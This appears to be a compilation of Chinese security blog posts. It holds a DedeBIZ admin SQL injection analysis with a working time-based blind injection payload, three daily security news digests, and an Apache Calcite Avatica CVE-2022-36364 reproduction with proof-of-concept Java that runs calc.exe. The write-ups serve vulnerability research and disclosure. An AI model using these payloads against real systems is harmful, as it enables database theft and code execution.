1)AND+(case(1)when(ascii(substr((select(database()))from(1)for(1)))=100)then(sleep(5))else(1)end (case(1)when(ascii(substr((select(database()))from(1)for(1)))=100)then(sleep(5))else(1)end 为 true 与查询出的数据库名 dedebiz 第一个字母 d 的 ascii 相符合。 为什么我们操作的时候需要那么多的前置条件呢，接下来我会详细说明，首先我们从代码层面查看： src/admin/diy_list.php 对传入的参数 数组 id 通过 ， 拼接起来，最后传参到 SQL 语句： $query = "DELETE FROM `$diy->table` WHERE id IN ($ids)"; 参数可以通过 ） 闭合，构成 SQL 注入 我们注意到：          $query = "DELETE FROM `$diy->table` WHERE id IN ($ids)";        if ($dsql->ExecuteNoneQuery($query)) {            showmsg('删除成功', "diy_list.php?action=list&diyid={$diy->diyid}");       } else {            showmsg('删除失败', "diy_list.php?action=list&diyid={$diy->diyid}");       } 执行的结果并不会直接返回到界面上，所以这个漏洞时一个盲注漏洞，基于盲注漏洞的特点以及执行数据库时，如果这个表为空，那么便不会执行成功，为了使这个数据库语句执行成功，数据库中必须先保存有数据。 同时这个注入漏洞可以说绝无仅有： 对比代码我们发现，就这一部分没有对变量 id 的类型进行检测。

1、NetSupport远控木马通过ClickFix技术传播 https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution 安全研究人员发现NetSupport远程访问木马（RAT）事件显著增加，NetSupport RAT允许攻击者完全控制受害主机，可监视屏幕、控制键盘和鼠标、上传下载文件，并执行恶意命令。此次事件中，攻击者利用了新兴的“ClickFix”初始访问向量（IAV），通过社交工程诱导用户执行恶意PowerShell命令，从而下载和运行NetSupport RAT。 2、超1.2万台KerioControl防火墙面临RCE漏洞威胁 https://www.bleepingcomputer.com/news/security/over-12-000-keriocontrol-firewalls-exposed-to-exploited-rce-flaw/ GFI KerioControl防火墙因编号CVE-2024-52875的远程代码执行漏洞，导致超过1.2万个实例暴露于网络攻击风险之中。尽管官方已发布安全补丁，但该漏洞利用技术门槛极低，即使是技术不熟练的黑客也能轻易发起攻击。当前，受影响的防火墙实例广泛分布于伊朗、美国、意大利等多个国家。安全人员已检测到针对该漏洞的主动攻击行为，攻击者的主要目标是窃取管理员的CSRF 3、苹果紧急修复被利用的iOS零日漏洞CVE-2025-24200 https://thehackernews.com/2025/02/apple-patches-actively-exploited-ios.html 苹果公司发布紧急安全更新，修复了iOS和iPadOS中的零日漏洞CVE-2025-24200。该漏洞是一个授权问题，攻击者可利用其禁用锁定设备上的USB限制模式，需物理接触设备才能实施攻击。苹果通过改进状态管理解决了该问题，并表示该漏洞可能已被用于针对特定目标的复杂攻击。此次更新适用于iPhone XS及更新机型和多款iPad。 4、臭名昭著的8Base勒索软件被查，4名嫌疑人被捕 https://www.freebuf.com/news/421413.html 泰国警方2月10日宣布，一项执法行动已成功查封了臭名昭著的8Base勒索软件团伙，逮捕了与之相关的4名欧洲籍嫌疑人。 5、国防部：规范互联网军事信息传播，清朗网络涉军生态 https://baijiahao.baidu.com/s?id=1823480768882101964 《办法》共5章30条，重点对从事互联网军事信息传播活动，开办互联网军事网站平台、网站平台军事栏目、军事账号，以及对互联网军事信息传播实施监督管理等作出规范，自3月1日起施行。 6、SystemBC远控木马现瞄准Linux，传播勒索和信息窃取程序 https://www.freebuf.com/articles/endpoint/421497.html 威胁分析师发现了一种新出现的威胁：SystemBC RAT（远程访问木马）的一个变种，目前正积极针对基于Linux的平台。这一新进展将企业网络、云基础设施和物联网设备置于危险之中。 7、美国科技巨头加大力度投资 AI 数据中心 https://www.solidot.org/story?sid=80507 美国主要科技公司都公布了 2024 年的财报，Alphabet/Google、微软、亚马逊 和 Meta 四大巨头 2024 年的设备投资额同比增长 6 成，达到约 2450 亿美元。 8、英国军方启动快速扩充网络战士的新招募计划 https://www.secrss.com/articles/75480 英国国防部2月6日宣布推出新的招募计划，以解决英国武装部队内部网络人才短缺的问题，增加应对和打击网络威胁的能力。 9、安全厂商警告2000万个OpenAI账号权限遭出售 https://www.secrss.com/articles/75477 Malwarebytes实验室称，如果这批代售数据为真，考虑到数据量巨大，攻击者很可能利用系统漏洞或特权账号攻陷了auth0.openai.com子域名；OpenAI发言人表示，它正在认真评估数据泄露报告，但尚未发现其系统受到损害的任何证据。 10、工信部发布关于防范PLAYFULGHOST恶意软件的风险提示 https://www.secrss.com/articles/75403 近日，工业和信息化部网络安全威胁和漏洞信息共享平台（CSTIS）监测发现PLAYFULGHOST恶意软件持续活跃，主要针对Windows用户实施攻击窃取敏感信息。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、黑客利用Open Graph协议漏洞进行钓鱼攻击 https://cyble.com/blog/open-graph-spoofing-toolkit/ 安全员研究人员发现一款名为“OG Spoof”的工具包，该工具包利用Open Graph协议的漏洞，通过操纵社交媒体上的网页预览，诱导用户点击恶意链接，从而实施网络钓鱼攻击。该工具包还支持与广告系统集成，进一步扩大攻击范围。此类攻击手法在加密货币骗局和X平台（前身为Twitter）上的欺诈活动中尤为常见。 2、SVG文件成新型网络钓鱼攻击载体 https://news.sophos.com/en-us/2025/02/05/svg-phishing/ 近期，网络犯罪分子利用SVG（可缩放矢量图形）文件格式进行网络钓鱼攻击，该格式可隐藏恶意HTML、脚本和软件。攻击者通过发送带有SVG附件的邮件，诱使用户点击其中的恶意链接，进而将用户重定向至钓鱼页面，窃取其登录信息。此类攻击自去年年底开始蔓延，1月中旬以来显著增加，且攻击手段日益复杂，包括使用CAPTCHA验证码门控页面、多语言版本攻击以及自动加载钓鱼页面等。 3、ABB修复Drive Composer关键路径遍历漏洞 https://securityonline.info/cve-2024-48510-cvss-9-8-critical-flaw-in-abb-drive-composer-enables-file-system-access/ 工业自动化巨头ABB近日披露其Drive Composer软件中存在关键路径遍历漏洞（CVE-2024-48510），CVSS评分高达9.8，影响版本包括2.9.0.1及以下的入门版和专业版。该漏洞允许攻击者利用特制的恶意文件访问主机文件系统，进而执行任意代码、泄露数据或破坏工业系统。ABB已发布2.9.1版本修复漏洞，并建议用户立即更新。此外，ABB提供了多项安 4、CISA要求联邦机构修补严重Linux内核漏洞 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-linux-kernel-bug-exploited-in-attacks/ 美国网络安全和基础设施安全局（CISA）已要求联邦机构在三周内修补编号为CVE-2024-53104的Linux内核漏洞。该漏洞源于USB视频类驱动程序中的越界写入缺陷，可使攻击者通过物理接触在设备上提升权限，而无需额外的执行权限。受影响的内核版本为2.6.26及以上。谷歌已在2025年2月的Android安全更新中发布了补丁，并警告该漏洞可能已被有限且有针对性的 5、国际民航组织招聘数据库泄露数万人受影响 https://securityaffairs.com/173863/data-breach/icao-and-acao-breached-cyberespionage-groups-targeting-aviation-safety-specialists.html 国际民航组织（ICAO）近日确认，其招聘数据库遭到网络攻击，导致部分个人数据外泄。据调查，本次事件涉及2016年4月至2024年7月期间约42000份招聘申请数据记录，其中11929名申请人受到直接影响。泄露数据包括姓名、电子邮件地址、出生日期及工作经历等招聘相关信息，但未涉及银行信息、密码、护照详细信息及上传文件。ICAO 6、PlayStation 网络大范围瘫痪全球玩家受影响 https://hackread.com/playstation-network-down-outage-gamers-frustrated/ 2025年2月8日午夜起，PlayStation Network（PSN）发生严重中断，导致全球玩家无法使用账户登录、在线游戏、PlayStation Store等核心功能。此次中断影响范围广泛，包括PS5、PS4、PS3及PS Vita等所有PlayStation平台设备。目前，索尼尚未公布此次事件的具体原因，也未给出预计修复时间。外界猜测可能为服务器故障甚至潜在的网络攻击，但尚无确切证据。索尼称正在积极解决问题，并建议用户关注PSN状态页面及官方 7、《公共安全视频图像信息系统管理条例》4月起施行 https://www.thepaper.cn/newsDetail_forward_30121654 《条例》旨在规范公共安全视频系统管理，维护公共安全，保护个人隐私和个人信息权益，共34条，其中，严格规范建设，严禁非法乱建。 8、AI 语音诈骗分子冒充意大利国防部长，盯上多名商界精英 https://www.ithome.com/0/829/757.htm 据彭博社报道，近日意大利发生了一起利用人工智能语音工具实施诈骗的事件。诈骗分子伪装成意大利国防部长克罗塞托（Guido Crosetto）及其团队成员，试图说服意大利一些顶级企业家向海外汇款。 9、2024年全球漏洞总数达到44,957个，创历史新高 https://www.freebuf.com/articles/421373.html 《报告》显示，2024年全球漏洞总数达到44,957个，相较于2023年增长超过50%，创下历史新高。其中，高危和严重漏洞的占比超过50%。这一趋势反映了软件开发和使用的复杂性在不断增加，漏洞的发现和披露周期也在缩短，全球企业在漏洞披露、修复的过程中，面临着更大的压力和挑战。 10、英国政府秘密要求苹果为iCloud帐户设置后门 https://cybersecuritynews.com/uk-govt-orders-apple-to-create-backdoor-icloud/ 据《华盛顿邮报》报道，英国政府上个月发布了一项未公开指令，要求苹果公司为其创建一个能够访问全球iCloud用户内容的安全后门。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、OPA Gatekeeper配置漏洞致Kubernetes镜像风险 https://www.aquasec.com/blog/risks-misconfigured-kubernetes-policy-engines-opa-gatekeeper/ 研究人员发现，Kubernetes策略引擎OPA Gatekeeper在配置不当的情况下，攻击者可利用配置错误绕过关键策略k8sallowedrepos，从而在受限环境中部署未经授权的镜像。该漏洞利用了策略逻辑的前缀匹配特性，攻击者通过子域名或类似命名空间可轻松绕过限制。研究还分析了其他策略引擎的类似风险，并提出了包括新版本k8sallowedrepos v2在内的解决方案。该版本支持精确匹配和更安全的配置。 2、黑客利用Cityworks漏洞攻击IIS服务器 https://www.bleepingcomputer.com/news/security/hackers-exploit-cityworks-rce-bug-to-breach-microsoft-iis-servers/ 软件供应商Trimble警告称，黑客正在利用Cityworks中的高危反序列化漏洞（CVE-2025-0994），对Microsoft IIS服务器发起远程命令执行（RCE）攻击，并部署Cobalt Strike信标实现网络入侵。Cityworks是一款面向地方政府和公用事业组织的资产和工单管理软件，其漏洞影响Cityworks版本15.8.9及23.10之前的版本， 3、印度储备银行推出专属bank.in域名以打击金融欺诈 https://www.rbi.org.in/Scripts/BS_PressReleaseDisplay.aspx?prid=59693 印度储备银行 (RBI) 宣布将为该国银行机构推出专属的“bank.in”互联网域名，旨在减少网络钓鱼等数字金融欺诈行为，并提升公众对数字银行服务的信任。此项域名服务将由银行技术发展与研究学院 (IDRBT) 独家管理，注册工作预计于2025年4月启动。同时，RBI还计划为其他非银行金融实体推出专属域名“fin.in”。 4、意大利披露Paragon间谍软件攻击欧洲多国受害者 https://www.governo.it/it/articolo/nota-di-palazzo-chigi/27601 意大利政府披露，以色列间谍软件公司Paragon Solutions通过WhatsApp对欧洲多国的数十名受害者发动了攻击。此次攻击涉及七名意大利人及其他欧洲国家的受害者，包括记者、移民倡导者和活动人士。攻击者利用了Paragon的零点击间谍软件，通过恶意PDF文件感染目标设备。WhatsApp已采取措施阻止了此次攻击，并向意大利国家网络安全局（ANC）提供了受害者信息。 5、双重注入技术绕过Chrome绑定加密机制发起攻击 https://cyble.com/blog/dual-injection-undermines-chromes-encryption/ 安全研究人员发现，一种高级恶意软件利用双重注入技术绕过Google Chrome的应用绑定加密，窃取敏感数据。该恶意软件通过ZIP文件传播，包含伪装成PDF文件的LNK文件和伪装成PNG文件的XML项目文件，主要针对越南的电话营销和销售部门。为逃避检测，该恶意软件采用无文件执行技术，通过进程注入和反射DLL注入在内存中隐秘运行代码，而不留下任何磁盘痕迹。这种复杂的攻击方式大幅提升了检测难度，增加了数据泄露的风险。 6、研究人员在Hugging Face平台发现恶意ML模型 https://www.reversinglabs.com/blog/rl-identifies-malware-ml-model-hosted-on-hugging-face 研究团队近日在Hugging Face平台上发现两款嵌有恶意代码的机器学习（ML）模型。这些模型利用了Python的Pickle文件反序列化特性，通过滥用PyTorch模型存储格式传播恶意负载，实现了连接硬编码IP的反向Shell操作。这些恶意模型表明攻击者正探索绕过ML平台安全防护的新技术，研究团队已将发现报告给Hugging Face，后者迅速移除了相关模型并改进了扫描工具。 7、思科修复身份服务引擎 (ISE) 安全漏洞 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-multivuls-FTW9AOXF 思科公司发布了一份安全通告，指出其身份服务引擎（ISE）存在多个严重的安全漏洞。这些漏洞包括不安全的Java反序列化漏洞（CVE-2025-20124）和授权绕过漏洞（CVE-2025-20125）。攻击者如果拥有有效的只读管理凭据，可以利用这些漏洞在受影响的设备上执行任意命令、获取敏感信息、更改节点配置并重启设备。思科公司表示，目前没有可用的临时解决方法，但已经发布了软件更 8、惠普Office 365遭黑客攻击致数据泄露 https://www.bleepingcomputer.com/news/security/hpe-notifies-employees-of-data-breach-after-russian-office-365-hack/ 惠普企业（HPE）已通知部分员工，其在2023年5月遭受的网络攻击中，至少16名员工的个人数据信息泄露。此次攻击由俄罗斯国家背景黑客组织Cozy Bear发起，该组织还与2020年SolarWinds供应链攻击有关。此外，HPE还面临其他安全威胁。黑客IntelBroker声称已于2025年1月16日入侵HPE系统，窃取了包括源代码、证书和个人身份信息在内的敏感数 9、FCC指控Telnyx公司涉嫌支持自动拨号进行电话诈骗 https://www.bleepingcomputer.com/news/security/robocallers-posing-as-fcc-fraud-prevention-team-call-fcc-staff/ 美国联邦通信委员会（FCC）近日宣布，拟对语音服务提供商Telnyx处以449.25万美元的罚款，原因是该公司涉嫌违反“了解你的客户”（KYC）规则，允许客户冒充FCC的“反欺诈团队”拨打诈骗电话。2024年2月6日至7日，超过十几名FCC员工及其家属接到此类电话，诈骗者使用人工合成语音，声称是FCC的“欺诈预防团队”，并要求接听者支付1000美元的谷歌礼品卡以避免被监禁。 10、黑客通过LLMjacking牟利，每月30美元出售被盗AI访问权限 https://www.freebuf.com/news/421317.html Sysdig的研究揭示了一个令人担忧的现象：一个针对大型语言模型（LLM）的黑市正在形成。ORP（OpenAI反向代理）运营商向攻击者提供未经授权的被盗账户访问权限，从而获取巨额利润。本文将深入剖析攻击者如何窃取访问权限，并利用LLM进行牟利。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前段时间看到Apache Calcite Avatica远程代码执行漏洞 CVE-2022-36364 在网上搜索也没有找到相关的分析和复现文章，于是想着自己研究一下，看能不能发现可以利用的方法。 首先利用一下最近比较热门的 Deepseek ，询问他是否清楚漏洞相关的信息。 通过回答我们可以了解到这个漏洞的概况，具体漏洞的版本，以及漏洞产生的原因。 漏洞简介 Apache Calcite Avatica JDBC 驱动程序根据通过 httpclient_impl 连接属性提供的类名来创建 HTTP 客户端实例；但是在驱动程序实例化之前不会验证该类是否实现了预期的接口，这样一来就会导致可以通过调用任意类来执行代码。 执行这个漏洞并造成一定的危害性，还需要两个先决条件： 必须拥有控制 JDBC 连接参数的权限 类路径中有一个具有 URL 参数和执行代码能力的函数（目前需要自己构造） 漏洞复现&分析 简单点，通过 maven 来创建漏洞环境        <!-- https://mvnrepository.com/artifact/org.apache.calcite.avatica/avatica -->        <dependency>            <groupId>org.apache.calcite.avatica</groupId>            <artifactId>avatica</artifactId>            <version>1.21.0</version>        </dependency> 创建完成漏洞环境后，我们就需要来编写一段代码想办法触发这个漏洞，我个人的建议是通过对比代码补丁，一般来说修复完成代码后，总会写一个测试类来进行测试 import org.apache.calcite.avatica.BuiltInConnectionProperty; import org.apache.calcite.avatica.ConnectionConfig; import org.apache.calcite.avatica.ConnectionConfigImpl; import org.apache.calcite.avatica.remote.AvaticaHttpClient; import org.apache.calcite.avatica.remote.AvaticaHttpClientFactory; import org.apache.calcite.avatica.remote.AvaticaHttpClientFactoryImpl; import java.net.URL; import java.util.Properties; public class test {    public static void main(String[] args) throws Exception {        Properties props = new Properties();        props.setProperty(BuiltInConnectionProperty.HTTP_CLIENT_IMPL.name(),"className");        URL url = new URL("url");        ConnectionConfig config = new ConnectionConfigImpl(props);        AvaticaHttpClientFactory httpClientFactory = new AvaticaHttpClientFactoryImpl();        AvaticaHttpClient client = httpClientFactory.getClient(url, config, null);   } } 这样一来我们就编写了一个漏洞 Demo calssName 和 url 的值是我们可以操作控制的，我们进行调试分析一下 org.apache.calcite.avatica.remote.AvaticaHttpClientFactoryImpl#getClient 这个地方我们就注意到了最后调用 instantiateClient 来处理的两个参数 className 和 url 一个来自于直接传参，另一个来自于 config.httpClientClass() 会从 config 对象中获取 HTTP 客户端的实现类名称，并将其作为一个 String 返回 ‍ 所以当参数传入到 org.apache.calcite.avatica.remote.AvaticaHttpClientFactoryImpl#instantiateClient 其中的两个参数 className 和 url 都是我们可以控制的 不需要向下继续调试，我们就看到了关键代码 constructor.newInstance(Objects.requireNonNull(url)); 这样一来我们就可以通过控制 className 和 url 来实现调用任意类，但是这个类的必须有 URL 参数的处理 刚开始想到的方法是 利用 spring 中的类构造函数加载远程配置实现 RCE org.springframework.context.support.ClassPathXmlApplicationContext import org.springframework.context.support.ClassPathXmlApplicationContext; public class JXpathDemo {    public static void main(String[] args) {        String s = "http://127.0.0.1:8080/bean.xml";        ClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext(s);   } } 似乎如此一来就满足了条件，我们先试试 爆出了一个错误，我们注意到 lassPathXmlApplicationContext 类没有接收 java.net.URL 参数的构造方法。ClassPathXmlApplicationContext 类的构造方法接收的是 String 类型的路径，通常是用于加载 Spring 配置文件的路径。 所以这种利用方式适用于很多种情况 Apache Commons JXPath 远程代码执行、PostgresQL JDBC Driver 任意代码执行 等，但是并不适配当前的环境。(目前还没有找到合适的类来触发利用这种漏洞) 为了进一步体现危害性，我自己创建一个类来体现 import java.net.URL; public class CustomHttpClient {    private URL url;    // 构造函数，接受一个 URL 类型的参数    public CustomHttpClient(URL url) throws Exception {        Runtime.getRuntime().exec("calc.exe");   } } 漏洞修复 通过对比我们发现对传入的类进行了控制，限定必须属于AvaticaHttpClient 的子类 https://github.com/apache/calcite-avatica/commit/0c097b6a685fc1f97f151505a219976f15ed0c4c?diff=split&w=0&